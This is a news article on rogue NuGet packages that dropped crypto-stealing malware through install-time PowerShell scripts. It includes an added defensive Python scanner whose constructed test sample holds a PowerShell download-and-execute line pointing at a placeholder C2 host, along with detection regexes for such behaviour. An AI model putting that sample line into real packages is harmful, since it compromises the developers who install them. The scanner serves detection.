Rogue NuGet packages infect .NET developers with crypto-stealing malware

March 22, 2023 | Ravie Lakshmanan | DevOpsSec / Malware

The NuGet repository is the target of a new “sophisticated and highly malicious attack” that aims to infect .NET developer systems with cryptocurrency-stealing malware.

The 13 rogue packages, which were downloaded more than 160,000 times in the past month, have since been removed.

“The packages contained a PowerShell script that would run upon installation and trigger a download of a ‘second-stage’ payload, which could be remotely executed,” said JFrog researchers Natan Nehorai and Brian Moussalli.

While NuGet packages have previously been found to contain vulnerabilities and to be misused for spreading phishing links, this is the first discovery of packages carrying malicious code.

Three of the most downloaded packages – Coinbase.Core, Anarchy.Wrapper.Net and DiscordRichPresence.API – accounted for 166,000 downloads alone, although it’s also possible that the threat actors artificially inflated the download counts with bots to make the packages look more legitimate.

The use of Coinbase and Discord underscores the continued reliance on typosquatting techniques, where fake packages are given names similar to legitimate packages, to trick developers into downloading them.

The malware embedded in the packages acts as a dropper: it automatically runs PowerShell code that retrieves a follow-up binary from a hardcoded server.

As an additional obfuscation mechanism, some packages did not embed the malicious payload directly, but instead pulled it in through another booby-trapped package declared as a dependency.

Even more problematic is that the connection to the command-and-control server (C2) is over HTTP (as opposed to HTTPS), making it vulnerable to an adversary-in-the-middle (AiTM) attack.
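As an added illustration of the install-script pattern described above (my own example, not JFrog's tooling or code from the article), the following Python scanner unpacks a .nupkg and flags legacy NuGet install-time scripts that fetch content from a remote host, use plaintext HTTP, or execute what they fetched; the package contents are constructed samples, and the behaviour regexes are heuristics I chose, not a published signature set.

```python
import io
import re
import zipfile

# Legacy NuGet install-time hooks: PowerShell scripts under tools/ that the
# Visual Studio Package Manager Console runs when a package is installed.
SCRIPT_HOOKS = re.compile(r"^tools/(init|install|uninstall)\.ps1$", re.IGNORECASE)

# Behaviours worth flagging in an install script: fetching a second stage,
# plaintext HTTP (exposed to adversary-in-the-middle), and executing what
# was fetched. These are heuristics chosen for this example, not a full signature set.
SUSPICIOUS = {
    "remote_download": re.compile(
        r"\b(Invoke-WebRequest|Invoke-RestMethod|DownloadFile|DownloadString|Start-BitsTransfer)\b", re.I),
    "plaintext_http": re.compile(r"\bhttp://[^\s'\"]+", re.I),
    "dynamic_exec": re.compile(r"\b(Invoke-Expression|iex|Start-Process)\b", re.I),
}

def scan_nupkg(package: bytes) -> dict:
    """Return {script path: sorted list of matched behaviours} for a .nupkg (a zip archive)."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for name in zf.namelist():
            if not SCRIPT_HOOKS.match(name.replace("\\", "/")):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            findings[name] = sorted(k for k, rx in SUSPICIOUS.items() if rx.search(text))
    return findings

def is_suspicious(package: bytes) -> bool:
    """True when any install-time script reaches out to a remote host."""
    return any("remote_download" in hits for hits in scan_nupkg(package).values())

def build_nupkg(files: dict) -> bytes:
    """Build an in-memory .nupkg from {path: content}; used only to construct sample input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for path, content in files.items():
            zf.writestr(path, content)
    return buf.getvalue()

# Constructed samples, not real packages. The hostname is a placeholder.
BENIGN = build_nupkg({
    "example.nuspec": "<package/>",
    "lib/net6.0/Example.dll": b"\x00",
    "tools/init.ps1": "param($installPath, $toolsPath)\nImport-Module (Join-Path $toolsPath 'Example.psm1')\n",
})
DROPPER_LIKE = build_nupkg({
    "example.nuspec": "<package/>",
    "tools/init.ps1": "$u = 'http://c2.example.invalid/stage2'\n$p = Invoke-WebRequest -Uri $u\nInvoke-Expression $p.Content\n",
})

if __name__ == "__main__":
    for label, pkg in (("benign", BENIGN), ("dropper-like", DROPPER_LIKE)):
        print(label, scan_nupkg(pkg), "SUSPICIOUS" if is_suspicious(pkg) else "ok")
```

Run the same scan over every .nupkg in a local package cache or a private feed mirror to surface install-time scripts before a developer's Package Manager Console executes them.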

The second-stage malware is what JFrog describes as a “fully customized executable payload” that can be changed dynamically at will since it is fetched from the C2 server.

The second-stage payload adds further capabilities, including a cryptocurrency stealer and an automatic update module that polls the C2 server for a newer version of the malware.

The findings come as the software supply chain has become an increasingly lucrative avenue for compromising developers’ systems and stealthily propagating backdoor code to downstream users.

“This proves that no open source repository is safe from malicious actors,” said Shachar Menashe, senior director at JFrog Security Research, in a statement shared with The Hacker News.

“.NET developers using NuGet remain at high risk of malicious code infecting their environments and should exercise caution when curating open source components for use in their builds—and at every stage of the software development lifecycle—to ensure that the software supply chain remains secure.”
